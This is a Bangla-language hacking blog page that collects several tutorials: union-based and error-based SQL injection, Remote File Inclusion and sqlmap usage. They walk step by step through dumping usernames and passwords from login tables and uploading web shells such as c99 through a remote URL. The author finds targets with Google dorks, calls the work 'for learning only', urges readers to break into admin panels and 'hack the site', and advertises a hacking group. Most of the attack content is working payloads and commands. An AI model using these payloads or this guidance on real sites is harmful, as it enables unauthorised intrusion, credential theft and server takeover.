এখন আমাদের কাজ ডাটাবেস থেকে ডাটা হ্যাক করা।
আমরা এখন ডাটাবেসের সংরক্ষিত গোপন ডাটা গুলো হ্যাক করতে পারবো।
এছাডাও আমরা ডাটাবেসের নাম database() এই কমান্ড টি ব্যাবহার করে,
ডাটাবেস ভার্সন জানতে  version() এই কমান্ডটি ব্যাবহার করে বের করতে পারবো।
এছাডাও আমরা SQL INJECTION এর মাধ্যমে লোড ফাইল মেথড ব্যাবহার করে
ভুলনরাবল সাইটে শেল আপলোড দিতে পারবো (এই বিষয়ে পরে টিউটোরিয়াল লেখা হবে)
এই টিউটোরিয়াল টি তে আমরা ডাটাবেস ইউজার নেম এবং ডাটাবেস ভার্সন বের করবো,
৩ এবং ৪ নম্বর String কলাম ব্যাবহার করে।
উদাহারণঃ

http://www.exaplme.sqlsite.com/page.php?id=-20 union select 1,2,version(),group_concat(database(),0x3a,user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

আমি এখানে 0x3a ব্যাবহার করেছি এটা হলো সেমিকোলন (;) এর হেক্স ভ্যালু
এটা দুইটা ডিফারেন্ট ভ্যালু কে ডিফারেন্ট প্যারামিটার এ সেপারেট করে দেখাবে।
এখন দেখা যাবে যে ৩ এর ৪ নম্বর ভুলনারবল সাইটের জায়গায় ডাটাবেস ভার্সন এবং
ডাটাবেসের ইউজারের নাম দেখাবে।
এখন আমরা ভুলনারবল সাইটের যে যে ডাটাবেস সেটা বের করবো।
তার জন্যে আমাদের কলাম নেমের জায়গায় SQL QUERY দিয়ে রিপ্লেস করতে হবে।
উদাহারণঃ

http://www.exaplme.sqlsite.com/page.php?id=-20 union select 1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.schemata--

এখন আমরা দুইটা ডাটাবেস দেখতে পাবো
একটি information_schema আরেকটি site_database এটা সাইট এডমিন যে নামে দিয়েছে সে নামে হবে
এখন information_schema নিয়ে আমাদের কোনো কাজ নেই কারণ
কারণ information_schema তে সিস্টেম টেবিল থাকে যা ডাটাবেস কে ডিফাইন করে।
আমরা এই টেবিল গুলো ব্যাবহার করে ডাটাবেসের লে-আউট স্টাইল চেক করতে পারবো।
যায় হোক এইগুলা অনেক এডভান্স লেভেলের কথা বার্তা লোল :p
যা এখন আপনারা বুঝতে পারবেন না।
এখন আমাদের কাছে ডাটাবেস আছে (আসলে আমাদের ডাটাবেসের নাম চেক করার দরকার ছিলো না
আমি শুধু শেখার উদ্দেশ্যে সেই বিষয়ে বললাম।আমরা যদি সাইটের ডাটাবেস থেকে ডাটা হ্যাক করতে চায়
তাহলে আমরা ডাটাবেস ফাংশন ব্যাবহার করেই ডাটা ডাম্প করতে পারি।
সে ক্ষেত্রে site_database এর নাম জানার আর দরকার হবে না।
আমরা এই টিউটোরিয়ালে database() এই ফাংশন টি ব্যাবহার করে ডাটা হ্যাক করবো।)
এখন আমরা ডাটাবেস থেকে টেবিলস বের করবো।
এখন আমরা where কন্ডিশন টি ব্যাবহার করবো এই query তে।
আমরা টেবিলস নেম বের করবো select statement ব্যাবহার করে
এবং where কন্ডিশনটি ব্যাবহার করবো এটা দেখানোর জন্যে কোন ডাটাবেস থেকে আমরা টেবিলস
বের করতে চাচ্ছি।
উদাহারণঃ

http://www.exaplme.sqlsite.com/page.php?id=-20 union select 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.tables where table_schema=database()--

এখন আপনি টেবিলস দেখতে পাবেন।
মনে করেন এই টেবিলস গুলা আমরা পেলাম।

archive,corrigendum,eselling,login,login_hindi,login_private,news,tbl_complaint,tbl_email_sender,tbl_email_sender_hindi,tbl_email_sender_private,tbl_home_animation,tbl_home_private,tbl_pages,tbl_pages_hindi,tbl_pages_private,tbl_sub_pages,tbl_tnc,tender,tender2,tender3,tender_drawing,unit

এখন আমাদের দেখতে হবে এই গুলোর মধ্যে সেনসেটিভ টেবিল কোনটা যেখানে গুরুত্বপূর্ণ ডাটা থাকবে ?
সেটা হচ্ছে login টেবিল।
এক এক ক্ষেত্রে এক এক রকম হতে পারে টেবিল নেম। নিজের বুদ্ধি খাটান!
আমরা এখন login টেবিল থেকে ডাটা হ্যাক করবো ।
এখন আমরা group_concat(table_name) কে group_concat(column_name) এবং information_schema.tables কে information_schema.columns
দিয়ে রিপ্লেস করবো এবং table_schema এর জায়গায় table_name ব্যাবহার করবো।
এখন আমারা table_name কে একটি প্যারামিটার দিবো টেবল নেম টি quote এ নিয়ে আসবো
table_name='login'
আমরা qoute কেনো ব্যাবহার করলাম??
কারণ এটার ডাটা টাইপ varchar...
অনেক সময় এই পদ্ধতি টি কাজ করে নাহ...
সে ক্ষেত্রে টেবিল নাম কে char এ রুপান্তর করতে হয়।
এটা করার জন্যে মোজিলা ফায়ার ফক্সে হ্যাকবার নামে একটি এডঅন আছে ওটা এড করে নিন।
সহজের char এ রুপান্তর করতে পারবেন।
আমি login table টাকে char এ রুপান্তর করার পর সেটা হলো
CHAR(108, 111, 103, 105, 110)
এখন আমরা কমান্ডটি ব্যাবহার কিভাবে করে সেটা দেখবো।
উদাহারণঃ

http://www.exaplme.sqlsite.com/page.php?id=-20 union select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns where table_name=CHAR(108, 111, 103, 105, 110)--

এখন আমরা login টেবিলের কলাম গুলো দেখতে পাবে
আমি যা যা পেলাম।
id,username,password,email,date_added,lastlogin,sessionid,type,status
এখন আসল কাজ শুরু ।
এখন আমরা কলাম থেকে id এবং password হ্যাক করবো ।
এখন আমরা (username,0x3a,password) এই কমান্ডটি ব্যাবহার করবো
এবং login টেবিল থেকে এই দুইটি কলামের ডাটা বের করবো ।
যার জন্যে কমান্ড হবে।
উদাহারণঃ

http://www.exaplme.sqlsite.com/page.php ?id=-20 union select 1,2,3,group_concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from login--

এখন আপনি username এবং password দেখতে পাবেন।
এখন আপনার কাজ হবে এডমিন প্যানেল বের করে সাইটটা তে শেল আপলোড করে হ্যাক করে ফেলা :D
আমি আছি ফেইসবুকেঃ http://facebook.com/zayyan.ahmed.71
যদি কেউ রিকুএস্ট পাঠান দয়া করে একটা মেসেজ দিয়ে দিবেন সাথে।
যাতে বুঝতে সুবিধা হয়।
প্রায় পাঁচ ঘন্টা কষ্ট করে সম্পূর্ণ পোস্টটা লেখলাম, আশা করি আপনাদের অনেক ভালো লেগেছে।
আপনাদের কমেন্টের আশায় থাকলাম।

Read more

RFI Hacking Tutorial In Bangla

Remote File Inclusion হলো বর্তমান সময়ের জনপ্রিয় হ্যাকিং পদ্ধতি গুলোর মধ্যে একটি।
যা ওয়েব এপ্লিকেশনে পাওয়া যায়।
এই ধরনের দুর্বলতাকে ব্যাবহার করে হ্যাকার দুর্বল সাইটটির সার্ভারে ফাইল এড/যোগ করতে পারে।
যদি হ্যাকার সফল ভাবে এই কাজটি করতে সক্ষম হয় তাহলে সে সেই দুর্বল সাইটটি কে হ্যাক করতে পারবে।
এবং তার সাথে সাথে সার্ভারটি ও হ্যাক করা সম্ভব।
সাধারনত এই টাইপের দুর্বলতা গুলো এই ধরনের সাইটে থাকে যেই সাইট গুলোর লিঙ্ক গুলো এরকম হয়।

উদাহারণঃ http://www.Targetsite.com/index.php?page=index.php

এই দুর্বলতাটি তে দুর্বল সাইট বের করার জন্যে সবচেয়ে বেশী কার্যকর google dork হচ্ছে

“inurl:index.php?page=”

এই Dork টি index.php?page ইউআরএলের যত সাইট আছে সব গুলো আপনাকে রেসাল্টে দেখাবে।
যেকোনো একটি সাইটে প্রবেশ করুন এবং সাইটটি দুর্বল নাকি চেক করার জন্যে
?page= এর পর www.google.com এড করে এন্টার চাপুন।

উদাহারণঃ www.targetsite.com/index.php?page=www.google.com

যদি মনে করেন ওয়েবসাইট টি হয় http://example.com/v2/index.php?page=index.php

তাহলে কোড দেওয়ার পর লিঙ্কটি হবে এরকমঃ

http://www.example.com/v2/index.php?page=http://google.com/

যদি সাইটটি এখন গুগলে রিডাইরেক্ট করে।
মানে যদি আপনি এই লিঙ্কে যাওয়ার পর দেখতে পান যে গুগল দেখা যাচ্ছে তাহলে সাইট টি দুর্বল।
যদি না আসে।। তাহলে আরেকটি সাইট খুজে বের করেন!
এরপরে।। এখন কাজ হলো হ্যাকিং শেল আপলোড দেওয়া।
শেল ডাউনলোড করার জন্যে গুগল করতে পারেন।
(madspot shell download)(wso shell download)
(b347k shell download)
Etc...
যায় হোক LFI এর জন্যে আমাদের শেল ডাউনলোড করা লাগবে না।
শেল আপলোড করা আছে এমন কোনো হোস্টিং থাকলেয় চলবে
সেটার জন্যে গুগলে সার্চ করুন।
c99 shell.txt

http://www.c99txt.net/s/c99.txt (শেল লিঙ্ক)

এখন শেল আপলোড করার জন্যে লিঙ্কটি হবে।

http://www.vuln.rfisite.com/v2/index.php?page=http://www.c99txt.net/s/c99.txt

ধন্যবাদ আশা করি সবাই বুঝতে পেরেছেন।
সাইবার ওয়ার্ম।

Hack For Learn

Read more

SQL Map Tutorial In Bangla

সবাইকে স্বাগতম SQL Map টিউটোরিয়ালে ।

আজকে আমরা দেখবো কিভাবে উইন্ডোজ সিস্টেমে SQL Map ব্যাবহার করা হয়।প্রথমেই
পাইথন ডাউনলোড করুন এইখান থেকে

এই লিঙ্ক থেকে পাইথনের 3.4.1 এবং 2.7.8 ভার্সন ডাউনলোড করে নিন। ডাউনলোডের পর দুটোই ভার্সনই আপনার পিসিতে ইন্সটল করে নিন। SQL Map টুলটি Python ল্যাঙ্গুয়েজ দিয়ে বানানো হয়েছে । এই কারণে SQL MAP চালানোর জন্যে পাইথন ইন্সটল করে নিয়ে হবে। এরপরে এই লিঙ্ক থেকে SQL MAP এর জিপ ফাইলটি ডাউনলোড করুন।

• SQL MAP DOWNLOD করুন 

এখন SQL MAP ফাইলটি আনজিপ করুন । এরপর আনজিপ করা ফাইলটির ভিতরে প্রবেশ করলে আপনি আরেকটি ফোল্ডার দেখতে পাবেন ।
সেই ফোল্ডারটি কপি করে ডেক্সটপে সেভ করুন এবং আপনার যে নামে ইচ্ছে Rename করুন! আমি নাম দিলাম sqlmap এরপর স্টার্ট মেনু তে গিয়ে রান থেকে CMD চালু করুন । আবার কমান্ড লেখুনঃ cd desktop এরপরে লেখুনঃ cd sqlmap
এরপরে কাজ হবে ভুলনরাবল সাইট বের করা যেটা আমি আমার প্রথম টিউটোরিয়ালে লেখেছিলাম ।
প্রথম টিউটোরিয়ালটি দেখতে এই লিঙ্কে যান । SQLi সাইট বের করার পর এখন আমরা SQL Map এ কাজ শুরু করবো । প্রথমেই সাইটের ডাটাবেস বের করার জন্যে কমান্ড হবে ।

• sqlmap.py -u http://vulnerablesite.com/index.php?id=10 --dbs

এখানে -u দিয়ে বোঝানো হয়েছে url কে এবং --dbs দিয়ে ডাটাবেস।

ছবিটির তীর নির্দেশিত স্থানটি লক্ষ করুন এখানে লেখা আছে টেস্টের মাধ্যমে বোঝা যাচ্ছে যে টার্গেটের সাইটের ডাটাবেস My Sql দিয়ে করা
আপনি কি চান অন্য ডাটাবেস গুলোর টেস্ট গুলো বাদ দিতে?
সময় বাচাতে চায়লে ইয়েস লেখুন মানে Y লেখুন অন্যথা যদি ভালো মতন টেস্ট করতে চান তাহলে N লেখুন!
আমি Y দিলাম।
এরপর দেখাচ্ছে আপনিকি MySQL Injection এর সকল মেথড টেস্ট করে দেখতে চান?

আপনি যদি চান Y দিন অন্যথা N বা না । আমি Y দিলাম।
যায় হোক এরপর কাজ শুরু করে দিবে আপনার SQL MAP :D
এখানে দেখাচ্ছে যে সাইটটি ভুলনরাবল আপনি কি টেস্টটি চালু রাখত

এখন আমি y দিলাম ।
এখন SQLMAP তার কাজ শুরু করে দিবে।
এবং কিছুক্ষন পর ডাটাবেস দেখাবে।
বেশির ভাগ সময় দুইটি ডাটাবেস থাকে।
একটা ডাটাবেস হয় information_schema
অপরটি হয়ঃ victimsite_database (ভিকটিম সাইট ডাটাবেস বলতে বোঝানো হয়েছে আপনার যার সাইটে SQLi করতে চাচ্ছেন তার ডাটাবেসের নাম, এক এক সময় ডাটাবেসের নাম এক এক রকম হয়। যায় হোক ডাটাবেস বের করার পর এবার আমাদের কাজ হবে টেবিলস বের করা।
যার জন্যে কমান্ডঃ

sqlmap.py -u http://vulnerablesite.com/index.php?id=10 -D database name --tables

এই কমান্ডেও -u দ্বারা বোঝানো হয়েছে url কে -D দ্বারা বোঝানো হয়েছে ডাটাবেস এবং তারপরে দিবেন ডাটাবেসের নাম যা কিছুক্ষন আগে বের
বের করেছেন এবং --tables দ্বারা টেবিলস কে বোঝানো হয়েছে । এই কমান্ডটি কাজ হলো এই কমান্ডটি ডাটাবেস থেকে টেবিলস গুলো
ডাম্প করবে।
টেবিলস বের করার পর মনে করেন আপনি এই টেবিল গুলো পেলেনঃ

• admin_login
• gallery
• about-us
• contact
• email

এখন আমাদের উদ্দেশ্য হচ্ছে ওয়েবসাইট হ্যাক করা । ওয়েবসাইট হ্যাক করতে হলে দরকার হবে ওয়েবসাইটের এডমিন আইডি এবং পাসওয়ার্ডের।
এখন টেবিলস গুলোতে admin_login এই টেবিলসটাতেই এডমিন ইনফরমেশন থাকবে বা থাকার কথা ।
চলুন তাহলে আমরা এখন টেবিলস থেকে কলাম বের করি।
আমরা যে টেবিলিস থেকে কলাম বের করবো সেটা হচ্ছে admin_login এখন এই টেবিল থেকে কলাম বের করার জন্যে কমান্ড হবে
sqlmap.py -u http://www.vulnerable.com/index.php?id=10 -T admin_login --columns
এখানে আগের মতনই u দ্বারা rul এবং -T দ্বারা বোঝানো হয়েছে Table এবং columns দ্বারা বোঝানো হয়েছে কলাম কে।
এই কমান্ডের মানে হচ্ছে admin_login টেবিলস থেকে কলাম গুলো ডাম্প করা।
যায় হোক এখন মনে করে admin_login টেবিল থেকে এই কলাম গুলো পেলাম।

• id
• username
• password

এখন আমাদের কাজ হচ্ছে এই কলাম গুলো থেকে ডাটা ডাম্প করা  :)
যার জন্যে কমান্ড হবেঃ

sqlmap.py -u http://www.vulnerable.com/index.php?id=10 -T admin_login -U test --dump

এডমিন লগিন টেবিল থেকে ডাটা ডাম্প করা শেষ  :D
তারপর কি হবে আপনাদের বোঝারই কথা : D
ধন্যবাদ কষ্টে করে পড়ার জন্যে!
আপনার পড়তে যদি কষ্ট হয়ে থাকে তাহলে আমার লেখতে কত কষ্ট হয়েছে সেটা আপনাদের বোঝারই কথা :P অনেকেই ইনবক্সে হ্যাকিং শেখার জন্যে মেসেজ দেন। তাদের জন্যে এই ট্রেইনিং জোন খুললাম!

হ্যাক স্কুল বিডি ট্রেইনিং জোন
গ্রুপ এর জয়েন করার নিয়মকানুন গুলো দেখে নিয়ে আমাকে একটা ফেইসবুকে মেসেজ দিবেন :)
আমার ফেইসবুক আইডি

Read more

SQLi (Error Based SQLi) In Bangla

সবাইকে স্বাগতম ওয়েব হ্যাকিং নিয়ে লেখা আমার ৩য় টিউটোরিয়ালে।
আমি আমার গত ২টি টিউটোরিয়ালে SQLi (Sql Injection ) নিয়ে আলোচনা করেছি।
আজকের টিউটোরিয়ালটিও SQLi আর আরেকটি মেথড নিয়ে (Error Based SQLi)
(টিউটোরিয়ালটি শুধুমাত্র শিক্ষণীয় উদ্দ্যেশ্যে লেখা)
শুরুর আগেঃ
অনেকেই ফেইসবুকের ইনবক্সে জিজ্ঞাসা করেছেন SQLi শিখলে হ্যাকিং এর জন্যে কি ধরনের লাভ হবে (হে হে )

উত্তরঃ SQLi এর মাধ্যমে হ্যাকার ভুলনাবল ওয়েবসাইটের ডাম্প করেন ।। এবং তার মধ্যে সাইটের এডমিনের ইনফরমেশন

যেমন ইউজার নেম, পাসওয়ার্ড ইত্যাদি থাকে ।। এবং তারপর হ্যাকার সাহেব সাইটির এডমিন প্যানেল বের করে , আইডি পাসওয়ার্ড
দিয়ে লগিন করেন , এবং একটি আপলোডের অপশন বের করেন । এরপর তিনি সাইটটি তে শেল আপলোড দিয়ে । সাইটির যা ইচ্ছা তাই করতে
পারেন।
এছাড়া অনেক সময় SQLi করেই শেল আপলোড করা যায় ।। সে ক্ষেত্রে আইডি পাসওয়ার্ডের দরকার হয় না (সব ক্ষেত্রে না)
তাহলে শূরু করা যাক

www.site.com/artist.php?i=36

প্রথমে আমরা সাইটটি ভুলনারবল কিনা সেটা চেক করবো লিঙ্ক এর শেষে ' চিহ্ন দিয়ে ।

www.site.com/artist.php?i=36 '

যদি এরর দেখতে পান । তাহলে প্রথমে Union Based SQLi চেষ্টা করুন । তারপরও যদি না হয় তাহলে String Based SQLi চেষ্টা করে দেখুন।
এটাতেও যদি কাজ না হয় তাহলে চলুন ! নতুন পদ্ধতি তে ।
তারমানে "Error Based SQLi" চেষ্টা করে দেখি। আমরা order+by কমান্ড ব্যাবহার করে । এই সাইটের ডাটাবেসে কয়টি কলাম আছে সেটা বের করবো।
প্রথমেই আমরা এভাবে চেষ্টা করে দেখবো :
(আগের টিউটোরিয়াল গুলো না দেখলে বুঝবেন না)

• www.site.com/artist.php?i=36 order by 10--

• www.site.com/artist.php?i=36 order by 20--

order by 20 পর্যন্ত আসার পর যদি কোনো প্রকারের এরর দেখায় বা ডাটা মিস করে তাহলে বুঝতে হবে এই সাইটটিতে ১৯ কলাম আছে। তাই অর্ডার বাই ২০ এ আসার পর এরর দেখাচ্ছে কারণ ২০টি কলাম নেই ।
কলামের সংখ্যা যে ২০ হবে সব সময় এমন কথা নেই । এটা আমি শুধুমাত্র উদাহারণের জন্যে বোঝালাম ।
এইভাবে চেষ্টা করে যদি কোনো Error দেখতে না পান তাহলে String Based Method ব্যাবহার করতে হবে। এবার আমরা id=value এর শেষে ' দিবো ঠিক এভাবে =36' এবং order by 1--+ মানে order by এর পর নাম্বারের পর দুইটি মাইনাসচিহ্ন এবং একটি প্লাস ।

www.site.com/artist.php?i=36' order by 10--+  (no error)

www.site.com/artist.php?i=36' order by 15--+  (no error)

www.site.com/artist.php?i=36' order by 18--+  (no error)

www.site.com/artist.php?i=36' order by 19--+ (no error)

www.site.com/artist.php?i=36' order by 20--+ (Error!)

order by 20--+ এর পর যদি এরর দেখায় তাহলে বুঝতে হবে সাইটিতে ১৯ টি কলাম আছে। তাই ২০ পর্যন্ত গেলে এরর আসছে। কারণ এই সাইটে ২০টি কলাম নেই!।
এখন ভুলনারাবল কলাম বা স্ট্রিং কলামটি বের করতে হবে ।
যার জন্যে কমান্ড হচ্ছেঃ

www.site.com/artist.php?i=36' union select 1,2,3,4,5--+

এখন যদি সাইটটিতে Error Based SQLi হয় তাহলে এই ধরনের এরর দেখাবেঃ
The used SELECT statements have a different number of columns
এখন কাজ শুরু হবে Error Based SQLi এর ।
Error Based SQLi এর জন্যে আমরা কিছু নির্দিষ্ট Syntax ব্যাবহার করবো ।এখন যদি ডাটাবেসের  ইউজার, ভার্সন , ডাটাবেসের নাম বের করার জন্যে কমান্ড হবে ।

http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+

কমান্ড ব্যাবহার করা হয়েছে এটিঃ

and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

একটা বিষয় লক্ষ্য করুনঃ
এখানে আমরা হেক্স (Hex) ব্যাবহার করেছি। আমরা এখানে হেক্স ব্যাবহার না করেও কমান্ড দিতে পারি।তাহলে কোড টি হবে এরকমঃ

http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select concat(version())) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--

এখন যদি ডাটাবেস ভার্সন ৫ এর নিচে হয় মানে ৪ হয় তাহলে ডাটাবেসের  ইউজার, ভার্সন , ডাটাবেসের নাম বের করার জন্যে কমান্ড হবে ।

http://www.site.com/artist.php?i=36 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+

যদি এই কমান্ডটি ব্যাবহার করার পরে এরর দেখায় তাহলেও সমস্যা নেই :) তাহলে এই কমান্ড টি ব্যাবহার করবেনঃ

http://www.site.com/artist.php?i=36 or 1 group by concat_ws(0x7e,version(),user(),database(),floor(rand(0)*2))having min(0) or 1--+

যায় হোক এখন আমাদের কাছে ডাটাবেস ভার্সন, ডাটাবেসের নাম জানা আছে। এখন আমরা ইনজেক্ট শুরু করি। এখন আমরা দেখবো এই সাইটের কতটি ডাটাবেস আছে , বা ডাটাবেসের সংখ্যা কয়টি যার জন্যে কমান্ড হবে ।

http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,count(schema_name),0x27,0x7e) from information_schema.schemata limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+

এখন ডাটাবেসের সংখ্যা দেখাবে মানে সাইটে কতটি ডাটাবেস আছে সেটা শুধুমাত্র সংখ্যার মাধ্যমে দেখাবে । এরকম ভাবে ছবিঃ

এখন টেবিলস বের করতে হবে । তবে তার আগে আমরা দেখেনি ডাটাবেসে কয়টি টেবিলস আছে। মানে টেবিলস সংখ্যা কতো ।তার জন্যে কমান্ড হবে।

http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,count(table_name),0x27,0x7e) from information_schema.tables where table_schema=0x{hex-database-name} 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+

ছবি:

এখানে দেখাচ্ছে ১৫ টি তার মানে টেবলের সংখ্যা ১৫ ! এখন আমরা একটা একটা করে টেবিলস বের করবো।
যার জন্যে কমান্ড হবে:

http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,concat(table_name),0x27,0x7e) from information_schema.tables where table_schema=0x{hex-database-name} 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+

*লক্ষনীয় বিষয় উপরের কমান্ডের এক অংশে লক্ষ করলে দেখবেন "table_schema=0x(hex-database-name) এই জায়গায় আপনি কমান্ড ব্যাবহার করে যে ডাটাবেসের নাম বের করেছেন সেটাকে হেক্স (Hex) কনভার্ট করে দিবেন।
এর জন্যে হ্যাকবার নামে মোজিলা ফায়ারফক্স ব্রাউজারের একটি এডঅন আছে সেটা ব্যাবহার করতে পারেন।
যায় হোক এখন আমরা একটা একটা টেবিলস নেম দেখতে পাবো। এখন আমাদের দরকার হবে এডমিন টেবিলের যেখান থেকে আমরা এডমিন আইডি পাসওয়ার্ড নিয়ে সাইটটিতে প্রবেশ করতে পারি। যায় হোক। এর জন্যে আমরা লিমিট ফাংশন টি ব্যাবহার করবো।
কমান্ডটি ভালো ভাবে লক্ষ করুন (বোল্ড করা অংশটি)

http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,concat(table_name),0x27,0x7e) from information_schema.tables where table_schema=0x{hex-database-name} 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+

বোল্ড করা অংশিটিতে লেখা আছে "information_schema.tables limit 0,1"এখন আরেকটি টেবলস বের করতে আপনি limit 0,1 এর জায়গায় limit 1,1. limit 2,1 limit 3,1 এইভাবে ব্যাবহার করতে পারেন। যেহুতু এই সাইটের টেবিলস সংখ্যা ১৫ সেজন্যে আপনি limit 15,1 এর পর আর লিমিট বাড়ালে কোনো রেসাল্ট দেখাবে নাহ। যায় হোক লিমিট কিছুক্ষন বাড়ানোর পর আমি টেবিলস পেলাম "mass_users" একটা বিষয় লক্ষ রাখবেন এডমিন টেবিল সব সময়ে admin নামে থাকে না। অনেক সময় অন্য নামেও থাকে তবে তার সাথে login,user, এই ধরনের সব গুলা থাকবে ।। মানে টেবিলস নাম গুলো login,user এই ধরনের হবে।
যায় হোক এইভাবে টেবিলস বের করার পর আমরা এবার কলাম বের করবো ।প্রথমেই দেখে নিয় "mass users" টেবিলস টিতে কলামের সংখ্যা কতো।

http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,count(column_name),0x27,0x7e) from information_schema.columns where table_schema=0x{hex-database-name} and table_name=0x6d6173735f7573657273 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+
ছবিঃ

এখন আমরা একটা একটা করে কলাম নেম বের করবো ।কমান্ডঃ

http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,concat(column_name),0x27,0x7e) from information_schema.columns where table_schema=0x{hex-database-name} and table_name=0x6d6173735f7573657273 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+

উপরের কমান্ডটির বোল্ড করা অংশ গুলো দেখুনঃ
table_schema=0x{hex-database-name}   এখানে ডাটাবেসের নামটিকে হেক্সে কনভার্ট করে সেটা দিবেন।table_name=0x6d6173735f7573657273 এখানে আপনার প্রাপ্ত টেবিলস নামটিকে হেক্সে কনভার্ট করে দিবেন।যেমন আমি "mass_users" কে হেক্সে কনভার্ট করেছি।information_schema.tables limit 0,1 এবং ৫ টি কলাম একটির পর একটি দেখতে লিমিট বাড়িয়ে যাবেন।
এখন আমি কলাম পেলাম এই ৫টিঃ
id,username,password,firstname,email
এখন আমার কাজ "username: email : password" এই তিনটি কলাম নিয়ে। এই তিনটি কলাম থেকে ডাটা ডাম্প বা হ্যাক করার জন্যে কমান্ড হবেঃ

http://www.site.com/artist.php?i=36' and+(select 1 from(select+count(*),concat((select+concat(username,0x3a,password,0x3a,email) from mass_users+limit+0,1),floor(rand(0)*2))x from information_schema.tables+group by x)a) and 1=1--+

যারা হ্যাকিং শিখতে আগ্রহী তার এই ফেইসবুক গ্রুপে জয়েন করতে পারেনঃ

• Hack School BD
• Facebook ID

Read more